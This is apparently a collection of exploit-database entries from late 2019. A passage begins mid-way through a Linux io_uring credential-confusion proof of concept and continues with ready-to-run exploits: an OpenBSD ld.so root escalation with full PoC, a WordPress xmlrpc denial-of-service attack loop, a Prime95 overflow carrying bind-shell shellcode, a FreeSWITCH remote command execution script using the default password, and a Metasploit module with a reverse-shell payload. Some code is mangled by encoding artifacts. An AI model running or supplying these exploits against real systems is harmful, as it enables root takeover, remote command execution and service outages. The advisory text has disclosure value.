.features = 0 }; SYSCHK(ioctl(uffd, UFFDIO_API, &api)); struct uffdio_register reg = { .mode = UFFDIO_REGISTER_MODE_MISSING, .range = { .start = (unsigned long)iov, .len = 0x1000 } }; SYSCHK(ioctl(uffd, UFFDIO_REGISTER, ®)); pthread_t thread; if (pthread_create(&thread, NULL, uffd_thread, NULL)) errx(1, "pthread_create"); // construct netlink message int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE)); struct sockaddr_nl addr = { .nl_family = AF_NETLINK }; struct { struct nlmsghdr hdr; struct ifaddrmsg body; struct rtattr opthdr; unsigned char addr[4]; } __attribute__((packed)) msgbuf = { .hdr = { .nlmsg_len = sizeof(msgbuf), .nlmsg_type = RTM_NEWADDR, .nlmsg_flags = NLM_F_REQUEST }, .body = { .ifa_family = AF_INET, .ifa_prefixlen = 32, .ifa_flags = IFA_F_PERMANENT, .ifa_scope = 0, .ifa_index = 1 }, .opthdr = { .rta_len = sizeof(struct rtattr) + 4, .rta_type = IFA_LOCAL }, .addr = { 1, 2, 3, 4 } }; real_iov.iov_base = &msgbuf; real_iov.iov_len = sizeof(msgbuf); struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr), .msg_iov = iov, .msg_iovlen = 1, }; // send netlink message via uring sqes[0] = (struct io_uring_sqe) { .opcode = IORING_OP_RECVMSG, .fd = sock, .addr = (unsigned long)&msg }; ((int*)(sq_ring + params.sq_off.array))[0] = 0; (*(int*)(sq_ring + params.sq_off.tail))++; int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0)); printf("submitted %d, getevents done\n", submitted); int cq_tail = *(int*)(cq_ring + params.cq_off.tail); printf("cq_tail = %d\n", cq_tail); if (cq_tail != 1) errx(1, "expected cq_tail==1"); struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes); if (cqe->res < 0) { printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res)); } else { printf("result: %d\n", cqe->res); } } $ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc 
noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ./uring_sendmsg got userfaultfd message submitted 1, getevents done cq_tail = 1 result: 32 $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet 1.2.3.4/32 scope global lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ========================================================================== The way I see it, the easiest way to fix this would probably be to grab a reference to the caller's credentials with get_current_cred() in io_uring_create(), then let the entry code of all the kernel worker threads permanently install these as their subjective credentials with override_creds(). (Or maybe commit_creds() - that would mean that you could actually see the owning user of these threads in the output of something like "ps aux". On the other hand, I'm not sure how that impacts stuff like signal sending, so override_creds() might be safer.) It would mean that you can't safely use an io_uring instance across something like a setuid() transition that drops privileges, but that's probably not a big problem? While the security bug was only introduced by the addition of IORING_OP_SENDMSG, it would probably be beneficial to mark such a change for backporting all the way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is called from rw_verify_area() has so far always attributed all the I/O operations to the kernel context, which isn't really a security problem, but might e.g. cause unexpected denials depending on the SELinux policy.
OpenBSD 6.x - Dynamic Loader Privilege Escalation
Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726) ============================================================================== Contents ============================================================================== Summary Analysis Demonstration Acknowledgments ============================================================================== Summary ============================================================================== We discovered a Local Privilege Escalation in OpenBSD's dynamic loader (ld.so): this vulnerability is exploitable in the default installation (via the set-user-ID executable chpass or passwd) and yields full root privileges. We developed a simple proof of concept and successfully tested it against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both amd64 and i386; other releases and architectures are probably also exploitable. ============================================================================== Analysis ============================================================================== In this section, we analyze a step-by-step execution of our proof of concept: ------------------------------------------------------------------------------ 1/ We execve() the set-user-ID /usr/bin/chpass, but first: 1a/ we set the LD_LIBRARY_PATH environment variable to one single dot (the current working directory) and approximately ARG_MAX colons (the maximum number of bytes for the argument and environment list); as described in man ld.so: LD_LIBRARY_PATH A colon separated list of directories, prepending the default search path for shared libraries. This variable is ignored for set-user-ID and set-group-ID executables. 
1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *) (2MB on amd64, 1MB on i386); as described in man setrlimit: RLIMIT_DATA The maximum size (in bytes) of the data segment for a process; this includes memory allocated via malloc(3) and all other anonymous memory mapped via mmap(2). ------------------------------------------------------------------------------ 2/ Before the main() function of chpass is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 262 void 263 _dl_setup_env(const char *argv0, char **envp) 264 { ... 271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp)); ... 283 _dl_trust = !_dl_issetugid(); 284 if (!_dl_trust) { /* Zap paths if s[ug]id... */ 285 if (_dl_libpath) { 286 _dl_free_path(_dl_libpath); 287 _dl_libpath = NULL; 288 _dl_unsetenv("LD_LIBRARY_PATH", envp); 289 } ------------------------------------------------------------------------------ 3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable and passes it to _dl_split_path(): 23 char ** 24 _dl_split_path(const char *searchpath) 25 { .. 35 pp = searchpath; 36 while (*pp) { 37 if (*pp == ':' || *pp == ';') 38 count++; 39 pp++; 40 } .. 45 retval = _dl_reallocarray(NULL, count, sizeof(*retval)); 46 if (retval == NULL) 47 return (NULL); ------------------------------------------------------------------------------ 4/ At line 45, count is approximately ARG_MAX (the number of colons in our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL. 
------------------------------------------------------------------------------ 5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH is ignored, but it is not deleted from the environment (CVE-2019-19726): although _dl_trust is false (_dl_issetugid() returns true because chpass is set-user-ID), _dl_unsetenv() is not called (line 288) because _dl_libpath is NULL (line 285). ------------------------------------------------------------------------------ 6/ Next, the main() function of chpass is executed, and it: 6a/ calls setuid(0), which sets the real and effective user IDs to 0; 6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY; 6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb (unlike execve(), execv() does not reset the environment). ------------------------------------------------------------------------------ 7/ Before the main() function of pwd_mkdb is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 7a/ at line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable (because it was not deleted from the environment in step 5, and because execv() did not reset the environment in step 6c); 7b/ at line 45, _dl_reallocarray() does not return NULL anymore (because our low RLIMIT_DATA was reset in step 6b); 7c/ as a result, _dl_libpath is not NULL (line 271), and it is not reset to NULL (line 287) because _dl_trust is true (_dl_issetugid() returns false because pwd_mkdb is not set-user-ID, and because the real and effective user IDs were both set to 0 in step 6a): our LD_LIBRARY_PATH is not ignored anymore. ------------------------------------------------------------------------------ 8/ Finally, ld.so searches for shared libraries in _dl_libpath (our LD_LIBRARY_PATH) and loads our own library from the current working directory (the dot in our LD_LIBRARY_PATH). 
------------------------------------------------------------------------------ ============================================================================== Demonstration ============================================================================== In this section, we demonstrate the use of our proof of concept: ------------------------------------------------------------------------------ $ id uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) $ cd /tmp $ cat > lib.c << "EOF" #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF $ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [libutil.so.13.1] 0x0000000000000001 (NEEDED) Shared library: [libc.so.95.1] $ gcc -fpic -shared -s -o libutil.so.13.1 lib.c $ cat > poc.c << "EOF" #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." 
static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF $ gcc -s -o poc poc.c $ ./poc /usr/bin/chpass # id uid=0(root) gid=0(wheel) groups=32767(nobody) ------------------------------------------------------------------------------ ============================================================================== Acknowledgments ============================================================================== We thank Theo de Raadt and the OpenBSD developers for their incredibly quick response: they published a patch for this vulnerability in less than 3 hours. We also thank MITRE's CVE Assignment Team. [https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner> This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.
XnConvert 1.82 - Denial of Service (PoC)
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC) # Date: 2019-12-21 # Vendor Homepage: https://www.xnview.com # Software Link: https://www.xnview.com/en/apps/ # Exploit Author: Gokkulraj (TwinTech Solutions) # Tested Version: v1.82 # Tested on: Windows 7 x64 # 1.- Download and install XnConvert # 2.- Run python code : XnConvert.py # 3.- Open EVIL.txt and copy content to clipboard # 4.- Open XnConvert and Click 'EnterKey' # 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' # 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash. #!/usr/bin/env python Dos= "\x41" * 9000 myfile=open('Evil.txt','w') myfile.writelines(Dos) myfile.close() print("File created")
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service
#!/usr/bin/env python # WordPress <= 5.3.? Denial-of-Service PoC # Abusing pingbacks+xmlrpc multicall to exhaust connections # @roddux 2019 | Arcturus Security | labs.arcturus.net # TODO: # - Try and detect a pingback URL on target site # - Optimise number of entries per request, check class-wp-xmlrpc-server.php from urllib.parse import urlparse import sys, uuid, urllib3, requests urllib3.disable_warnings() DEBUG = True def dprint(X): if DEBUG: print(X) COUNT=0 def build_entry(pingback,target): global COUNT COUNT +=1 entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>" entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>" #entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>" entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>" #entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more return entry def build_request(pingback,target,entries): prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>" suffix = "</array></param></params></methodCall>" request = prefix for _ in range(0,entries): request += build_entry(pingback,target) request += suffix return request def usage_die(): print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>") exit(1) def get_args(): if len(sys.argv) != 4: usage_die() action = sys.argv[1] pingback = sys.argv[2] target = sys.argv[3] if action not in ("check","attack"): usage_die() for URL in (pingback,target): res = urlparse(URL) if not all((res.scheme,res.netloc)): usage_die() return (action,pingback,target) def main(action,pingback,target): print("[>] WordPress <= 5.3.? 
Denial-of-Service PoC") print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net") # he checc if action == "check": entries = 2 # he attacc elif action == "attack": entries = 2000 # but most importantly print(f"[+] Running in {action} mode") # he pingbacc print(f"[+] Got pingback URL \"{pingback}\"") print(f"[+] Got target URL \"{target}\"") print(f"[+] Building {entries} pingback calls") # entries = 1000 # TESTING xmldata = build_request(pingback,target,entries) dprint("[+] Request:\n") dprint(xmldata+"\n") print(f"[+] Request size: {len(xmldata)} bytes") if action == "attack": print("[+] Starting attack loop, CTRL+C to stop...") rcount = 0 try: while True: try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2) #dprint(resp.content.decode("UTF-8")[0:500]+"\n") if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: pass rcount += 1 print(f"\r[+] Requests sent: {rcount}",end="") except KeyboardInterrupt: print("\n[>] Attack finished",end="\n\n") exit(0) elif action == "check": print("[+] Sending check request") try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10) if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- check target url") print("[+] Request sent") print("[+] Response headers:\n") print(resp.headers) print("[+] Response dump:") print(resp.content.decode("UTF-8")) print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: print("[!] Connection error") exit(1) print("[>] Check finished") if __name__ == "__main__": main(*get_args())
Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH) # Date: 2019-12-22 # Vendor Homepage: https://www.mersenne.org # Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip # Exploit Author: Achilles # Tested Version: 29.8 build 6 # Tested on: Windows 7 x64 # 1.- Run python code:Prime95.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open Prime95.exe go to PrimeNet # 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name" # 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host" # 6.- Press ok Twice and you will have a bind shell port 3110 # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer =3D "\x41" * 660 nseh =3D "\xeb\x06\x90\x90" #jmp short 6 seh =3D struct.pack('<L',0x6ee410b1) #libhwloc-15.dll nops =3D "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20 "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" "\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" 
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" "\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") payload =3D buffer + nseh + seh + nops + shellcode try: Dopen("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
FreeSWITCH 1.10.1 - Command Execution
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution # Date: 2019-12-19 # Exploit Author: 1F98D # Vendor Homepage: https://freeswitch.com/ # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi # Version: 1.10.1 # Tested on: Windows 10 (x64) # # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to # it after authenticating. By default commands are not accepted from remote hosts. # # -- Example -- # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami # Authenticated # Content-Type: api/response # Content-Length: 20 # # nt authority\system # #!/usr/bin/python3 from socket import * import sys if len(sys.argv) != 3: print('Missing arguments') print('Usage: freeswitch-exploit.py <target> <cmd>') sys.exit(1) ADDRESS=sys.argv[1] CMD=sys.argv[2] PASSWORD='ClueCon' # default password for FreeSWITCH s=socket(AF_INET, SOCK_STREAM) s.connect((ADDRESS, 8021)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: print('Authenticated') s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) response = s.recv(8096).decode() print(response) else: print('Authentication failed') sys.exit(1) else: print('Not prompted for authentication, likely not vulnerable') sys.exit(1)
OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'OpenBSD Dynamic Loader chpass Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in the OpenBSD `ld.so` dynamic loader (CVE-2019-19726). The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH` environment variable when set with approximately `ARG_MAX` colons. This can be abused to load `libutil.so` from an untrusted path, using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid executable, resulting in privileged code execution. This module has been tested successfully on: OpenBSD 6.1 (amd64); and OpenBSD 6.6 (amd64) }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2019-12-11', 'Platform' => %w[bsd unix], # OpenBSD 'Arch' => [ARCH_CMD], 'SessionTypes' => ['shell'], 'References' => [ ['CVE', '2019-19726'], ['EDB', '47780'], ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'], ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'], ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'], ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'], ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig'] ], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse', 'WfsDelay' => 10 }, 'DefaultTarget' => 0)) register_options [ OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass']) ] register_advanced_options [ 
OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def chpass_path datastore['CHPASS_PATH'] end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def is_root? (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0') end def libutil_name return unless command_exists? 'readelf' cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first end def check patches = cmd_exec('syspatch -l').to_s patch = '013_ldso' if patches.include? patch vprint_error "Patch #{patch} has been installed. Target is not vulnerable." return CheckCode::Safe end vprint_good "Patch #{patch} is not present" unless command_exists? 'cc' vprint_error 'cc is not installed' return CheckCode::Safe end print_good 'cc is installed' CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? 
base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9 lib_data = <<-EOF #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF libs = [] lib = libutil_name if lib libs << lib print_good "Found libutil.so name: #{lib}" else libs << 'libutil.so.12.1' libs << 'libutil.so.13.1' print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}" end lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c" upload lib_src_path, lib_data libs.each do |lib_name| lib_path = "#{base_dir}/#{lib_name}" print_status "Compiling #{lib_path} ..." output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall" register_file_for_cleanup lib_path unless output.blank? print_error output fail_with Failure::Unknown, "#{lib_path}.c failed to compile" end end # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9 exploit_data = <<-EOF #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload "#{exploit_path}.c", exploit_data print_status "Compiling #{exploit_path} ..." 
output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall" register_file_for_cleanup exploit_path unless output.blank? print_error output fail_with Failure::Unknown, "#{exploit_path}.c failed to compile" end payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload payload_path, "#!/bin/sh\n#{payload.encoded}\n" chmod payload_path print_status 'Launching exploit...' output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}") output.each_line { |line| vprint_status line.chomp } end end